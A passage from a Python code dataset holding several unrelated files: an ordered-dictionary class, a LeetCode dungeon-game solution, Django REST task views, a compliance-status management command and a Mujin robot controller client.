__iter__(self):\n\t\treturn iter(self._cles)\n\n\tdef reverse(self):\n\n\t\tcles=[]\n\t\tvaleurs=[]\n\n\t\tfor elt,valeur in self.items():\n\n\t\t\tcles.insert(0,elt)\n\t\t\tvaleurs.insert(0,valeur)\n\n\t\tself._cles=cles\n\t\tself._valeurs=valeurs\n\tdef __add__(self,d):\n\n\t\tif type(self) is not type(d):\n\t\t\traise TypeError(\"deux types différent\")\n\n\t\telse:\n\t\t\tnouv=DictionnaireOrdonne()\n\t\t\tfor i,elt in self.items():\n\t\t\t\tnouv[i]=elt\n\t\t\tfor i,elt in d.items():\n\t\t\t\tnouv[i]=elt\n\t\t\treturn nouv\n\n\n\n\n\n\n","sub_path":"dictord.py","file_name":"dictord.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"529766907","text":"class Solution(object):\n def calculateMinimumHP(self, dungeon):\n \"\"\"\n :type dungeon: List[List[int]]\n :rtype: int\n \"\"\"\n m = len(dungeon)\n n = len(dungeon[0])\n dungeon[-1][-1] = 1 if dungeon[-1][-1] >= 0 else 1 - dungeon[-1][-1]\n\n #HP must be greater than 0\n for i in range(m-2, -1, -1):\n dungeon[i][-1] = max(1,dungeon[i+1][-1] - dungeon[i][-1])\n for j in range(n-2, -1, -1):\n dungeon[-1][j] = max(1,dungeon[-1][j+1] - dungeon[-1][j])\n for i in range(m-2, -1, -1):\n for j in range(n-2, -1, -1):\n a = max(1,dungeon[i+1][j] - dungeon[i][j])\n b = max(1,dungeon[i][j+1] - dungeon[i][j])\n dungeon[i][j] = min(a,b)\n return dungeon[0][0]\n\ns = Solution()\ndungeon = [[-3,-12,4],[4,-2,0],[6,-7,-2]]\nprint(s.calculateMinimumHP(dungeon))\ndungeon = [[-2,-3,3],[-5,-10,1],[10,30,-5]]\nprint(s.calculateMinimumHP(dungeon))\n\n","sub_path":"174. Dungeon Game/174.py","file_name":"174.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"226398294","text":"#loggin\nimport logging\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n#filtering data\nfrom rest_framework import filters, generics\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom .models import Task\nfrom .serializers import TaskSerializer\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\n########## API VIEWS ###########\n\n#info primary screen\n@api_view(['GET'])\ndef apiUrlInfo(request):\n logger.info('API url Info Execution')\n api_urls = {\n\t\t'Tareas':'/api/list/',\n 'Crear':'/api/new/',\n\t\t'Detalles':'/api/detail//',\n\t\t'Actualizar':'/api/update//',\n\t\t'Eliminar':'/api/delete//',\n 'Filtrar': 'api/list/filter/?search='\n\t\t}\n return Response(api_urls)\n\n\n@api_view(['GET'])\ndef taskList(request):\n logger.info('Task List Execution')\n tasks = Task.objects.all().order_by('-date_posted')\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef taskDetail(request, pk):\n logger.info('Task Detail Execution')\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(task, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef taskNew(request):\n logger.info('Task New Execution')\n serializer = TaskSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef taskUpdate(request, pk):\n logger.info('Task Update Execution')\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef taskDelete(request, pk):\n logger.info('Task Delete Execution')\n task = Task.objects.get(id=pk)\n task.delete()\n\n return Response('Tarea eliminada')\n\n#filtering#\nclass taskListFilter(generics.ListAPIView):\n logger.info('Tasks Filters Execution')\n queryset = Task.objects.all().order_by('-date_posted')\n serializer_class = TaskSerializer\n filter_backends = [filters.SearchFilter]\n search_fields = ['title', 'date_posted']\n","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491289489","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom ledger.accounts.models import EmailUser\nfrom commercialoperator.components.compliances.models import Compliance, ComplianceUserAction\nfrom commercialoperator.components.compliances.email import send_due_email_notification, send_internal_due_email_notification\nimport datetime\nimport itertools\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Change the status of Compliances from future to due when they are close to due date'\n\n def handle(self, *args, **options):\n today = timezone.localtime(timezone.now()).date()\n compare_date = today + datetime.timedelta(days=14)\n\n try:\n user = EmailUser.objects.get(email=settings.CRON_EMAIL)\n except:\n user = EmailUser.objects.create(email=settings.CRON_EMAIL, password='')\n\n logger.info('Running command {}'.format(__name__))\n for c in Compliance.objects.filter(processing_status = 'future'):\n #if(c.due_date<= compare_date<= c.approval.expiry_date) and c.approval.status=='current':\n if(c.due_date<= compare_date) and (c.due_date<= c.approval.expiry_date) and c.approval.status=='current':\n try:\n c.processing_status='due'\n c.customer_status='due'\n c.save()\n ComplianceUserAction.log_action(c,ComplianceUserAction.ACTION_STATUS_CHANGE.format(c.id),user)\n logger.info('updated Compliance {} status to {}'.format(c.id,c.processing_status))\n except:\n logger.info('Error updating Compliance {} status'.format(c.id))\n logger.info('Command {} completed'.format(__name__))\n","sub_path":"commercialoperator/management/commands/update_compliance_status.py","file_name":"update_compliance_status.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435491048","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2012-2015 MUJIN Inc\n\nimport copy\n\nfrom . import json\nfrom . import planningclient\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass RealtimeRobotControllerClient(planningclient.PlanningControllerClient):\n \"\"\"mujin controller client for realtimerobot task\n \"\"\"\n _robotname = None # optional name of the robot selected\n _robots = None # a dict of robot params\n _devices = None # a dict of device params\n _robotspeed = None # speed of the robot, e.g. 0.4\n _robotaccelmult = None # current robot accel mult\n _envclearance = None # environment clearance in milimeter, e.g. 20\n\n def __init__(self, robotname, robots, devices, robotspeed=None, robotaccelmult=None, envclearance=10.0, **kwargs):\n \"\"\"\n :param robotspeed: speed of the robot, e.g. 0.4\n :param envclearance: environment clearance in milimeter, e.g. 20\n \"\"\"\n super(RealtimeRobotControllerClient, self).__init__(**kwargs)\n self._robotname = robotname\n self._robots = robots\n self._devices = devices\n self._robotspeed = robotspeed\n self._robotaccelmult = robotaccelmult\n self._envclearance = envclearance\n\n def GetRobotName(self):\n return self._robotname\n\n def SetRobotName(self, robotname):\n self._robotname = robotname\n\n def GetRobots(self):\n return self._robots\n\n def SetRobots(self, robots):\n self._robots = robots\n\n def SetRobotConfig(self, robotname, robotconfig):\n self._robots[robotname] = robotconfig\n\n def GetDevices(self):\n return self._devices\n\n def SetDevices(self, devices):\n self._devices = devices\n\n def GetRobotControllerUri(self):\n robots = self._robots or {}\n return robots.get(self._robotname, {}).get('robotControllerUri', '')\n\n def IsRobotControllerConfigured(self):\n return len(self.GetRobotControllerUri()) > 0\n\n def IsDeviceIOConfigured(self):\n devices = self.GetDevices() or []\n if len(devices) > 0:\n return any([len(deviceParams.get('params', {}).get('host', '')) > 0 for deviceParams in devices])\n\n return False\n\n def SetRobotSpeed(self, robotspeed):\n self._robotspeed = robotspeed\n\n def SetRobotAccelMult(self, robotaccelmult):\n self._robotaccelmult = robotaccelmult\n\n def ExecuteCommand(self, taskparameters, robotname=None, devices=None, toolname=None, robots=None, robotspeed=None, robotaccelmult=None, envclearance=None, usewebapi=None, timeout=10, fireandforget=False):\n \"\"\"wrapper to ExecuteCommand with robot info set up in taskparameters\n\n executes a command on the task.\n\n :return: a dictionary that contains:\n - robottype: robot type,string\n - currentjointvalues: current joint values, DOF floats\n - elapsedtime: elapsed time in seconds, float\n - numpoints: the number of points, int\n - error: optional error info, dictionary\n - desc: error message, string\n - type: error type, string\n - errorcode: error code, string\n \"\"\"\n if robotname is None:\n robotname = self._robotname\n if robots is None:\n robots = self._robots\n if devices is None:\n devices = self._devices\n\n # caller wants to use a different tool\n if toolname is not None:\n if robots is not None:\n robots = copy.deepcopy(robots)\n if robotname not in robots:\n robots[robotname] = {}\n robots[robotname]['toolname'] = toolname\n else:\n # set at the first level\n taskparameters['toolname'] = toolname\n\n if robots is not None:\n taskparameters['robots'] = robots\n if robots is None or robotname in robots:\n taskparameters['robotname'] = robotname\n if devices is not None:\n taskparameters['devices'] = devices\n\n # log.debug('robotname = %r, robots = %r, devices = %r', robotname, robots, devices)\n\n if 'robotspeed' not in taskparameters:\n if robotspeed is None:\n robotspeed = self._robotspeed\n if robotspeed is not None:\n taskparameters['robotspeed'] = robotspeed\n\n if 'robotaccelmult' not in taskparameters:\n if robotaccelmult is None:\n robotaccelmult = self._robotaccelmult\n if robotaccelmult is not None:\n taskparameters['robotaccelmult'] = robotaccelmult\n\n if 'envclearance' not in taskparameters or taskparameters['envclearance'] is None:\n if envclearance is None:\n envclearance = self._envclearance\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n\n return super(RealtimeRobotControllerClient, self).ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def ExecuteTrajectory(self, trajectoryxml, robotspeed=None, timeout=10, **kwargs):\n \"\"\"Executes a trajectory on the robot from a serialized Mujin Trajectory XML file.\n \"\"\"\n taskparameters = {'command': 'ExecuteTrajectory',\n 'trajectory': trajectoryxml,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, timeout=timeout)\n\n def GetJointValues(self, timeout=10, **kwargs):\n \"\"\"gets the current robot joint values\n :return: current joint values in a json dictionary with\n - currentjointvalues: [0,0,0,0,0,0]\n \"\"\"\n taskparameters = {'command': 'GetJointValues'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def MoveJointStraight(self, deltagoalvalue, jointName, timeout=10, robotspeed=None, **kwargs):\n \"\"\"moves joint straight\n :param jointName: name of the joint to move\n :param deltagoalvalue: how much to move joint in delta\n \"\"\"\n taskparameters = {'command': 'MoveJointStraight',\n 'deltagoalvalue': deltagoalvalue,\n 'jointName': jointName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, timeout=timeout)\n\n def MoveToolLinear(self, goaltype, goals, toolname=None, timeout=10, robotspeed=None, **kwargs):\n \"\"\"moves the tool linear\n :param goaltype: type of the goal, e.g. translationdirection5d\n :param goals: flat list of goals, e.g. two 5d ik goals: [380,450,50,0,0,1, 380,450,50,0,0,-1]\n :param toolname: name of the manipulator, default is self.toolname\n\n :param maxdeviationangle: how much the tool tip can rotationally deviate from the linear path\n :param plannername:\n\n :param workspeed: [anglespeed, transspeed] in deg/s and mm/s\n :param workaccel: [angleaccel, transaccel] in deg/s^2 and mm/s^2\n :param worksteplength: discretization for planning MoveHandStraight, in seconds.\n :param workminimumcompletetime: set to trajduration - 0.016s. EMU_MUJIN example requires at least this much\n :param workminimumcompleteratio: in case the duration of the trajectory is now known, can specify in terms of [0,1]. 1 is complete everything\n :param numspeedcandidates: if speed/accel are not specified, the number of candiates to consider\n :param workignorefirstcollisionee: time, necessary in case initial is in collision, has to be multiples of step length?\n :param workignorelastcollisionee: time, necessary in case goal is in collision, has to be multiples of step length?\n :param workignorefirstcollision:\n\n \"\"\"\n taskparameters = {'command': 'MoveToolLinear',\n 'goaltype': goaltype,\n 'goals': goals,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, toolname=toolname, timeout=timeout)\n\n def MoveToHandPosition(self, goaltype, goals, toolname=None, envclearance=None, closegripper=0, robotspeed=None, robotaccelmult=None, timeout=10, **kwargs):\n \"\"\"Computes the inverse kinematics and moves the manipulator to any one of the goals specified.\n :param goaltype: type of the goal, e.g. translationdirection5d\n :param goals: flat list of goals, e.g. two 5d ik goals: [380,450,50,0,0,1, 380,450,50,0,0,-1]\n :param toolname: name of the manipulator, default is self.toolname\n :param envclearance: clearance in milimeter, default is self.envclearance\n :param closegripper: whether to close gripper once the goal is reached, default is 0\n \"\"\"\n taskparameters = {'command': 'MoveToHandPosition',\n 'goaltype': goaltype,\n 'goals': goals,\n 'closegripper': closegripper,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, robotaccelmult=robotaccelmult, envclearance=envclearance, toolname=toolname, timeout=timeout)\n\n def UpdateObjects(self, envstate, targetname=None, state=None, unit=\"mm\", timeout=10, **kwargs):\n \"\"\"updates objects in the scene with the envstate\n :param envstate: a list of dictionaries for each instance object in world frame. quaternion is specified in w,x,y,z order. e.g. [{'name': 'target_0', 'translation_': [1,2,3], 'quat_': [1,0,0,0], 'object_uri':'mujin:/asdfas.mujin.dae'}, {'name': 'target_1', 'translation_': [2,2,3], 'quat_': [1,0,0,0]}]\n :param unit: unit of envstate\n \"\"\"\n taskparameters = {'command': 'UpdateObjects',\n 'envstate': envstate,\n 'unit': unit,\n }\n if targetname is not None:\n taskparameters['objectname'] = targetname\n taskparameters['object_uri'] = u'mujin:/%s.mujin.dae' % (targetname)\n taskparameters.update(kwargs)\n if state is not None:\n taskparameters['state'] = json.dumps(state)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def Grab(self, targetname, toolname=None, timeout=10, **kwargs):\n \"\"\"grabs an object with tool\n :param targetname: name of the object\n :param toolname: name of the manipulator, default is self.toolname\n \"\"\"\n taskparameters = {'command': 'Grab',\n 'targetname': targetname,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, toolname=toolname, timeout=timeout)\n\n def Release(self, targetname, timeout=10, **kwargs):\n \"\"\"releases an object already grabbed\n :param targetname: name of the object\n \"\"\"\n taskparameters = {'command': 'Release',\n 'targetname': targetname,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetGrabbed(self, timeout=10, **kwargs):\n \"\"\"gets the names of the grabbed objects\n :return: names of the grabbed object in a json dictionary, e.g. {'names': ['target_0']}\n \"\"\"\n taskparameters = {'command': 'GetGrabbed',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetTransform(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\"gets the transform of an object\n :param targetname: name of the object\n :param unit: unit of the result translation\n :return: transform of the object in a json dictionary, e.g. {'translation': [100,200,300], 'rotationmat': [[1,0,0],[0,1,0],[0,0,1]], 'quaternion': [1,0,0,0]}\n \"\"\"\n taskparameters = {'command': 'GetTransform',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SetTransform(self, targetname, translation, unit='mm', rotationmat=None, quaternion=None, timeout=10, **kwargs):\n \"\"\"sets the transform of an object\n :param targetname: name of the object\n :param translation: list of x,y,z value of the object in milimeter\n :param unit: unit of translation\n :param rotationmat: list specifying the rotation matrix in row major format, e.g. [1,0,0,0,1,0,0,0,1]\n :param quaternion: list specifying the quaternion in w,x,y,z format, e.g. [1,0,0,0]\n \"\"\"\n taskparameters = {'command': 'SetTransform',\n 'targetname': targetname,\n 'unit': unit,\n 'translation': translation,\n }\n taskparameters.update(kwargs)\n if rotationmat is not None:\n taskparameters['rotationmat'] = rotationmat\n if quaternion is not None:\n taskparameters['quaternion'] = quaternion\n if rotationmat is None and quaternion is None:\n taskparameters['quaternion'] = [1, 0, 0, 0]\n log.warn('no rotation is specified, using identity quaternion ', taskparameters['quaternion'])\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetOBB(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\" Get the oriented bounding box of object\n :param targetname: name of the object\n :param unit: unit of the OBB\n :return: OBB of the object\n \"\"\"\n taskparameters = {'command': 'GetOBB',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInnerEmptyRegionOBB(self, targetname, linkname=None, unit='mm', timeout=10, **kwargs):\n \"\"\" Get the inner empty oriented bounding box of a container\n :param targetname: name of the object\n :param linkname: can target a specific link\n :param unit: unit of the OBB\n :return: OBB of the object\n \"\"\"\n taskparameters = {'command': 'GetInnerEmptyRegionOBB',\n 'targetname': targetname,\n 'unit': unit,\n }\n if linkname is not None:\n taskparameters['linkname'] = linkname\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInstObjectAndSensorInfo(self, instobjectnames=None, sensornames=None, unit='mm', timeout=10, **kwargs):\n \"\"\"returns information about the inst objects and sensors part of those inst objects\n \"\"\"\n taskparameters = {'command': 'GetInstObjectAndSensorInfo', 'unit':unit}\n if instobjectnames is not None:\n taskparameters['instobjectnames'] = instobjectnames\n if sensornames is not None:\n taskparameters['sensornames'] = sensornames\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInstObjectInfoFromURI(self, instobjecturi=None, unit='mm', timeout=10, **kwargs):\n \"\"\"opens a URI and returns info about the internal/external and geometry info from it\n \"\"\"\n taskparameters = {'command': 'GetInstObjectInfoFromURI', 'unit':unit}\n if instobjecturi is not None:\n taskparameters['objecturi'] = instobjecturi\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetAABB(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\"Gets the axis aligned bounding box of object\n :param targetname: name of the object\n :param unit: unit of the AABB\n :return: AABB of the object, e.g. {'pos': [1000,400,100], 'extents': [100,200,50]}\n \"\"\"\n taskparameters = {'command': 'GetAABB',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def RemoveObjectsWithPrefix(self, prefix=None, prefixes=None, objectPrefixesExpectingFromSlaveTrigger=None, timeout=10, usewebapi=None, fireandforget=False, removeRegionNames=None, doRemoveGrabbedObjects=False, **kwargs):\n \"\"\"removes objects with prefix\n \n :param doRemoveOnlyDynamic: if True, then remove objects that were added through dynamic means like UpdateObjects/UpdateEnvironmentState\n :param doRemoveGrabbedObjects: if True, then also removed objects even if they are grabbed by the robot.\n \"\"\"\n taskparameters = {'command': 'RemoveObjectsWithPrefix',\n }\n taskparameters.update(kwargs)\n if prefix is not None:\n taskparameters['prefix'] = prefix\n if prefixes is not None:\n taskparameters['prefixes'] = prefixes\n if objectPrefixesExpectingFromSlaveTrigger is not None:\n taskparameters['objectPrefixesExpectingFromSlaveTrigger'] = objectPrefixesExpectingFromSlaveTrigger\n if removeRegionNames is not None:\n taskparameters['removeRegionNames'] = removeRegionNames\n if doRemoveGrabbedObjects is not None:\n taskparameters['doRemoveGrabbedObjects'] = doRemoveGrabbedObjects\n return self.ExecuteCommand(taskparameters, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n \n def GetTrajectoryLog(self, timeout=10, **kwargs):\n \"\"\"Gets the recent trajectories executed on the binpicking server. The internal server keeps trajectories around for 10 minutes before clearing them.\n\n :param startindex: int, start of the trajectory to get. If negative, will start counting from the end. For example, -1 is the last element, -2 is the second to last element.\n :param num: int, number of trajectories from startindex to return. If 0 will return all the trajectories starting from startindex\n :param includejointvalues: bool, If True will include timedjointvalues, if False will just give back the trajectories. Defautl is False\n\n :return:\n\n total: 10\n trajectories: [\n {\n \"timestarted\": 12345215\n \"name\": \"movingtodest\",\n \"numpoints\": 100,\n \"duration\": 0.8,\n \"timedjointvalues\": [0, 0, 0, .....]\n },\n { ... }\n ]\n\n Where timedjointvalues is a list joint values and the trajectory time. For a 3DOF robot sampled at 0.008s, this is\n [J1, J2, J3, 0, J1, J2, J3, 0.008, J1, J2, J3, 0.016, ...]\n\n \"\"\"\n taskparameters = {'command': 'GetTrajectoryLog',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ChuckGripper(self, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"chucks the manipulator\n :param toolname: name of the manipulator, default is taken from self.robots\n \"\"\"\n taskparameters = {'command': 'ChuckGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def UnchuckGripper(self, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"unchucks the manipulator and releases the target\n :param toolname: name of the manipulator, default is taken from self.robots\n :param targetname: name of the target\n \"\"\"\n taskparameters = {'command': 'UnchuckGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def CalibrateGripper(self, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"goes through the gripper calibration procedure\n \"\"\"\n taskparameters = {'command': 'CalibrateGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def StopGripper(self, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n taskparameters = {'command': 'StopGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def MoveGripper(self, grippervalues, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"chucks the manipulator\n :param toolname: name of the manipulator, default is taken from self.robots\n \"\"\"\n taskparameters = {\n 'command': 'MoveGripper',\n 'grippervalues': grippervalues,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def ExecuteRobotProgram(self, robotProgramName, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"execute a robot specific program by name\n \"\"\"\n taskparameters = {\n 'command': 'ExecuteRobotProgram',\n 'robotProgramName': robotProgramName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def SaveScene(self, timeout=10, **kwargs):\n \"\"\"saves the current scene to file\n :param filename: e.g. /tmp/testscene.mujin.dae, if not specified, it will be saved with an auto-generated filename\n :param preserveexternalrefs: If True, any bodies currently that are being externally referenced from the environment will be saved as external references.\n :param externalref: If '*', then will save each of the objects as externally referencing their original filename. Otherwise will force saving specific bodies as external references\n :param saveclone: If 1, will save the scenes for all the cloned environments\n :return: the actual filename the scene is saved to in a json dictionary, e.g. {'filename': '2013-11-01-17-10-00-UTC.dae'}\n \"\"\"\n taskparameters = {'command': 'SaveScene'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SaveGripper(self, timeout=10, robotname=None, **kwargs):\n \"\"\"\n Separate gripper from a robot in a scene and save it.\n :param filename: str. File name to save on the file system. e.g. /tmp/robotgripper/mujin.dae\n :param robotname: str. Name of robot waiting for extracting hand from.\n :param manipname: str. Name of manipulator.\n :param timeout:\n :return:\n \"\"\"\n\n taskparameters = {'command': 'SaveGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout)\n\n def ResetRobotBridges(self, robots=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"resets the robot bridge states\n \"\"\"\n taskparameters = {\n 'command': 'ResetRobotBridges'\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robots=robots, timeout=timeout, usewebapi=usewebapi)\n\n def MoveJoints(self, jointvalues, jointindices=None, robotname=None, robots=None, robotspeed=None, robotaccelmult=None, execute=1, startvalues=None, envclearance=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"moves the robot to desired joint angles specified in jointvalues\n :param jointvalues: list of joint values\n :param jointindices: list of corresponding joint indices, default is range(len(jointvalues))\n :param robotspeed: value in [0,1] of the percentage of robot speed to move at\n :param envclearance: environment clearance in milimeter\n \"\"\"\n if jointindices is None:\n jointindices = range(len(jointvalues))\n log.warn(u'no jointindices specified, moving joints with default jointindices: %s', jointindices)\n\n taskparameters = {\n 'command': 'MoveJoints',\n 'goaljoints': list(jointvalues),\n 'jointindices': list(jointindices),\n 'execute': execute,\n }\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n\n if startvalues is not None:\n taskparameters['startvalues'] = list(startvalues)\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, robots=robots, robotspeed=robotspeed, robotaccelmult=robotaccelmult, timeout=timeout, usewebapi=usewebapi)\n\n def MoveToDropOff(self, dropOffInfo, robotname=None, robots=None, robotspeed=None, robotaccelmult=None, execute=1, startvalues=None, envclearance=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"moves the robot to desired joint angles specified in jointvalues\n :param robotspeed: value in [0,1] of the percentage of robot speed to move at\n :param envclearance: environment clearance in milimeter\n \"\"\"\n taskparameters = {\n 'command': 'MoveToDropOff',\n 'dropOffInfo': dropOffInfo,\n 'execute': execute,\n }\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n if startvalues is not None:\n taskparameters['startvalues'] = list(startvalues)\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, robots=robots, robotspeed=robotspeed, robotaccelmult=robotaccelmult, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariables(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariables'\n }\n if ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def SetRobotBridgeIOVariables(self, iovalues, robotname=None, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'SetRobotBridgeIOVariables',\n 'iovalues': list(iovalues)\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def SetRobotBridgeIOVariableAsciiHex16(self, ioname, iovalue, robotname=None, timeout=20, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'SetRobotBridgeIOVariableAsciiHex16',\n 'ioname': ioname,\n 'iovalue': iovalue,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariableAsciiHex16(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariableAsciiHex16'\n }\n if ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariableString(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariableString'\n }\n if ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n \n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def ComputeIkParamPosition(self, name, robotname=None, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'ComputeIkParamPosition',\n 'name': name,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def ComputeIKFromParameters(self, toolname=None, timeout=10, **kwargs):\n \"\"\"\n :param toolname: tool name, string\n :param limit: number of solutions to return, int\n :param ikparamnames: the ikparameter names, also contains information about the grasp like the preshape\n :param targetname: the target object name that the ikparamnames belong to\n :param freeincvalue: float, the discretization of the free joints of the robot when computing ik.\n :param filteroptionslist: A list of filter option strings can be: CheckEnvCollisions, IgnoreCustomFilters, IgnoreEndEffectorCollisions, IgnoreEndEffectorEnvCollisions, IgnoreEndEffectorSelfCollisions, IgnoreJointLimits, IgnoreSelfCollisions\n :param filteroptions: OpenRAVE IkFilterOptions bitmask. By default this is 1, which means all collisions are checked, int\n\n :return: A dictionary of:\n - solutions: array of IK solutions (each of which is an array of DOF values), sorted by minimum travel distance and truncated to match the limit\n \"\"\"\n taskparameters = {'command': 'ComputeIKFromParameters',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, toolname=toolname, timeout=timeout)\n\n def ReloadModule(self, 